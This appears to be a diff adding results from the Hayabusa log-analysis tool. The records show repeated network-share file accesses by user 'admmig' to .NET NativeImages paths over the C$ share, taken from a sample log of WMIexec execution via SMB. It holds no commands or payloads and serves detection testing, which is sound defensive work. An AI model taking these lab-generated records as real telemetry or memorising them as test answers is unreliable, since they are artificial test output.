+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
